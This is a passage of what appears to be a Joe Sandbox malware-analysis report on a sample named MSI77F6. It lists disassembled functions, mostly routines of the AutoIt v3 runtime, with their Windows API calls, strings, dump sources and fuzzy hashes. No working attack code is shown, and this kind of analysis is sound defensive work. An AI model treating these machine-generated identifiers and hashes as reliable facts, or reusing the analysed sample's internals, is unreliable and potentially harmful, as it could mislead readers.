                                        • GetClientRect.USER32(00000000,000000FF), ref: 0078A92B
                                        • GetStockObject.GDI32(00000011), ref: 0078A947
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0078A952
                                          • Part of subcall function 0078B736: GetCursorPos.USER32(000000FF), ref: 0078B749
                                          • Part of subcall function 0078B736: ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        • SetTimer.USER32(00000000,00000000,00000028,0078ACEE), ref: 0078A979
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: dde3456a3b06d87aaf2e754dc84d1b2b2f80a60ad1ebe717a777a645a223cc24
                                        • Instruction ID: 119af9088c52823c47f03e36066741d489c10c3d5738f3ea4669f6f32a1dceb8
                                        • Opcode Fuzzy Hash: dde3456a3b06d87aaf2e754dc84d1b2b2f80a60ad1ebe717a777a645a223cc24
                                        • Instruction Fuzzy Hash: A0B18D3164020AEFDB14EFA8DC49BAD7BB5FB48714F10462AFA15E7290D778E800CB55
                                        Function 007D69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 007D6A52
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007D6B12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-719923060
                                        • Opcode ID: e0ad133672f9f0244e307ad77e3b34dd3557d500402a5ed51170be08b59ea1a3
                                        • Instruction ID: 539ffe0fb68e3d9e13d647558f24794205eca3159806f2967adc3627b86459e0
                                        • Opcode Fuzzy Hash: e0ad133672f9f0244e307ad77e3b34dd3557d500402a5ed51170be08b59ea1a3
                                        • Instruction Fuzzy Hash: 9FA1A170254201DFCB14FF24C855A6A77A6FF85354F14886EF89A9B392DB38EC09CB52
                                        Function 007AE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 007AE6E1
                                        • _wcscmp.LIBCMT ref: 007AE6F2
                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AE71A
                                        • CharUpperBuffW.USER32(?,00000000), ref: 007AE737
                                        • _wcscmp.LIBCMT ref: 007AE755
                                        • _wcsstr.LIBCMT ref: 007AE766
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 007AE79E
                                        • _wcscmp.LIBCMT ref: 007AE7AE
                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AE7D5
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 007AE81E
                                        • _wcscmp.LIBCMT ref: 007AE82E
                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 007AE856
                                        • GetWindowRect.USER32(00000004,?), ref: 007AE8BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                        • String ID: @$ThumbnailClass
                                        • API String ID: 1788623398-1539354611
                                        • Opcode ID: 7012e3631a3bc39074b851bacab12c10205eca640a63547954b02f5d1f2ee687
                                        • Instruction ID: 32f1a2305f15c7e620c60f76fee5f075b184d0abda24b982fc8d3e37b0bac8a6
                                        • Opcode Fuzzy Hash: 7012e3631a3bc39074b851bacab12c10205eca640a63547954b02f5d1f2ee687
                                        • Instruction Fuzzy Hash: B481C231004305DBDB15DF10C885FAA7BE8FF85354F04866AFD899A092DB38ED46CBA1
                                        Function 007AE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 1038674560-1810252412
                                        • Opcode ID: 259c8248f3931eb8db92ad6e7dff8461bbb66ff32fe6d8d794e8319c6c87ba4c
                                        • Instruction ID: 568c0940fb3e2f1940e92234aba8f7b4bda840f03078710fe374629f86ea7d79
                                        • Opcode Fuzzy Hash: 259c8248f3931eb8db92ad6e7dff8461bbb66ff32fe6d8d794e8319c6c87ba4c
                                        • Instruction Fuzzy Hash: 3531E032A08216F6CE18FB50ED17EAE73A4AF12754F600624F425B11D2FFAD6F24C611
                                        Function 007AF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 007AF8AB
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007AF8BD
                                        • SetWindowTextW.USER32(?,?), ref: 007AF8D4
                                        • GetDlgItem.USER32(?,000003EA), ref: 007AF8E9
                                        • SetWindowTextW.USER32(00000000,?), ref: 007AF8EF
                                        • GetDlgItem.USER32(?,000003E9), ref: 007AF8FF
                                        • SetWindowTextW.USER32(00000000,?), ref: 007AF905
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007AF926
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007AF940
                                        • GetWindowRect.USER32(?,?), ref: 007AF949
                                        • SetWindowTextW.USER32(?,?), ref: 007AF9B4
                                        • GetDesktopWindow.USER32 ref: 007AF9BA
                                        • GetWindowRect.USER32(00000000), ref: 007AF9C1
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007AFA0D
                                        • GetClientRect.USER32(?,?), ref: 007AFA1A
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007AFA3F
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AFA6A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: 1507ad0b990d584739d084f49b60d2fb74bc0486302344e91b398172953e3532
                                        • Instruction ID: 4264b96ead0121a1ac31942170f232083a903e89713f5801283aecc301141c26
                                        • Opcode Fuzzy Hash: 1507ad0b990d584739d084f49b60d2fb74bc0486302344e91b398172953e3532
                                        • Instruction Fuzzy Hash: 51514A70900709EFDB209FA8CD89BAEBBB5FF44745F004A28E596E25A0C778A944CB10
                                        Function 007C01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcscpy.LIBCMT ref: 007C026A
                                        • _wcschr.LIBCMT ref: 007C0278
                                        • _wcscpy.LIBCMT ref: 007C028F
                                        • _wcscat.LIBCMT ref: 007C029E
                                        • _wcscat.LIBCMT ref: 007C02BC
                                        • _wcscpy.LIBCMT ref: 007C02DD
                                        • __wsplitpath.LIBCMT ref: 007C03BA
                                        • _wcscpy.LIBCMT ref: 007C03DF
                                        • _wcscpy.LIBCMT ref: 007C03F1
                                        • _wcscpy.LIBCMT ref: 007C0406
                                        • _wcscat.LIBCMT ref: 007C041B
                                        • _wcscat.LIBCMT ref: 007C042D
                                        • _wcscat.LIBCMT ref: 007C0442
                                          • Part of subcall function 007BC890: _wcscmp.LIBCMT ref: 007BC92A
                                          • Part of subcall function 007BC890: __wsplitpath.LIBCMT ref: 007BC96F
                                          • Part of subcall function 007BC890: _wcscpy.LIBCMT ref: 007BC982
                                          • Part of subcall function 007BC890: _wcscat.LIBCMT ref: 007BC995
                                          • Part of subcall function 007BC890: __wsplitpath.LIBCMT ref: 007BC9BA
                                          • Part of subcall function 007BC890: _wcscat.LIBCMT ref: 007BC9D0
                                          • Part of subcall function 007BC890: _wcscat.LIBCMT ref: 007BC9E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 2955681530-2806939583
                                        • Opcode ID: 01bcec92cf9e2d7981efbf7591e98190d97a4f63224e862a72ef8a5aa4930553
                                        • Instruction ID: 84a33ccbcf88c9eeb866885f5a6827537bd74d4fe3e9ac338a8fc9f05300e6db
                                        • Opcode Fuzzy Hash: 01bcec92cf9e2d7981efbf7591e98190d97a4f63224e862a72ef8a5aa4930553
                                        • Instruction Fuzzy Hash: 8D919071504741EFCB24EB50D959F9BB3E8AF85320F04885DF5499B292EB38EA44CB92
                                        Function 007DCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007DCD0B
                                        • DestroyWindow.USER32(00000000,?), ref: 007DCD83
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DCE04
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DCE26
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DCE35
                                        • DestroyWindow.USER32(?), ref: 007DCE52
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007DCE85
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DCEA4
                                        • GetDesktopWindow.USER32 ref: 007DCEB9
                                        • GetWindowRect.USER32(00000000), ref: 007DCEC0
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DCED2
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DCEEA
                                          • Part of subcall function 0078B155: GetWindowLongW.USER32(?,000000EB), ref: 0078B166
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 1297703922-3619404913
                                        • Opcode ID: 40ed6d931b141c99cb4b8175b663470e534736a6d13645305c0e03fd331773de
                                        • Instruction ID: 367951ed8da995076b7388a17699af4feb55bfa06b09d71c51d8a14fce6c316e
                                        • Opcode Fuzzy Hash: 40ed6d931b141c99cb4b8175b663470e534736a6d13645305c0e03fd331773de
                                        • Instruction Fuzzy Hash: 53717CB1144206AFDB26CF28CC49FAA7BF9FB88744F444919F985973A1D778E801CB15
                                        Function 007BB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 007BB46D
                                        • VariantCopy.OLEAUT32(?,?), ref: 007BB476
                                        • VariantClear.OLEAUT32(?), ref: 007BB482
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007BB561
                                        • __swprintf.LIBCMT ref: 007BB591
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 007BB5BD
                                        • VariantInit.OLEAUT32(?), ref: 007BB63F
                                        • SysFreeString.OLEAUT32(00000016), ref: 007BB6D1
                                        • VariantClear.OLEAUT32(?), ref: 007BB727
                                        • VariantClear.OLEAUT32(?), ref: 007BB736
                                        • VariantInit.OLEAUT32(00000000), ref: 007BB772
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 3730832054-3931177956
                                        • Opcode ID: 9a7b5431773bd77af037dfc8fb4484911ae70c17d2c30becb7dba729e5c86a62
                                        • Instruction ID: 0447ec0aaa5ce95f08beae2d2d2b73f7c64daa0c142d77b2af003039cf06fd06
                                        • Opcode Fuzzy Hash: 9a7b5431773bd77af037dfc8fb4484911ae70c17d2c30becb7dba729e5c86a62
                                        • Instruction Fuzzy Hash: 2DC1DF71A00615EFCB209FA5D889BB9B7B4FF45300F248466EC459B582DBBCEC50DBA1
                                        Function 007D6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 007D6FF9
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D7044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-4258414348
                                        • Opcode ID: 0d1596099c7ea9f3fc8095ee6d2392fea8ace1f81b67c4d671e6a5a66749e8fc
                                        • Instruction ID: 7fb665c5fc3f83dc83654dc3b47eb7993d212d33b9830faf03e9bfb06979650a
                                        • Opcode Fuzzy Hash: 0d1596099c7ea9f3fc8095ee6d2392fea8ace1f81b67c4d671e6a5a66749e8fc
                                        • Instruction Fuzzy Hash: 84918234244301DFCB18EF14C855A69B7B2BF98350F04885DF8965B7A2DB39ED4ACB52
                                        Function 007DE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DE3BB
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007DBCBF), ref: 007DE417
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DE457
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DE49C
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DE4D3
                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,007DBCBF), ref: 007DE4DF
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DE4EF
                                        • DestroyCursor.USER32(?), ref: 007DE4FE
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DE51B
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DE527
                                          • Part of subcall function 00791BC7: __wcsicmp_l.LIBCMT ref: 00791C50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 3907162815-1154884017
                                        • Opcode ID: b3f045d599aa2a3bd5c0faa8871e1c51d8c7d0e6b6c0f633e3c5bfc9cea23bbd
                                        • Instruction ID: d3a81bf294b93add10eb0774cdae205887a497592adb2d3a1bcbeb3306fa3d4a
                                        • Opcode Fuzzy Hash: b3f045d599aa2a3bd5c0faa8871e1c51d8c7d0e6b6c0f633e3c5bfc9cea23bbd
                                        • Instruction Fuzzy Hash: E861CE71540219FAEB25EF64DC46FBE77B8BB08720F108106F915EA2D0DB789D90D7A0
                                        Function 007C0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 007C0EFF
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007C0F0F
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007C0F1B
                                        • __wsplitpath.LIBCMT ref: 007C0F79
                                        • _wcscat.LIBCMT ref: 007C0F91
                                        • _wcscat.LIBCMT ref: 007C0FA3
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C0FB8
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0FCC
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C0FFE
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C101F
                                        • _wcscpy.LIBCMT ref: 007C102B
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007C106A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                        • String ID: *.*
                                        • API String ID: 3566783562-438819550
                                        • Opcode ID: ebbb4582d4f6d5c76a6302d177e1583642e4ef64c27d4ee54268ee40c3733241
                                        • Instruction ID: 29ff61626125dc4ab23f7c9082a6882ff7854812f9802f719d8e5fc04bdd8734
                                        • Opcode Fuzzy Hash: ebbb4582d4f6d5c76a6302d177e1583642e4ef64c27d4ee54268ee40c3733241
                                        • Instruction Fuzzy Hash: BF613F71504345EFCB10EF64C844E9AB7E9FF89310F04891EF98997252EB39EA45CB92
                                        Function 007BDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • CharLowerBuffW.USER32(?,?), ref: 007BDB26
                                        • GetDriveTypeW.KERNEL32 ref: 007BDB73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BDBBB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BDBF2
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BDC20
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
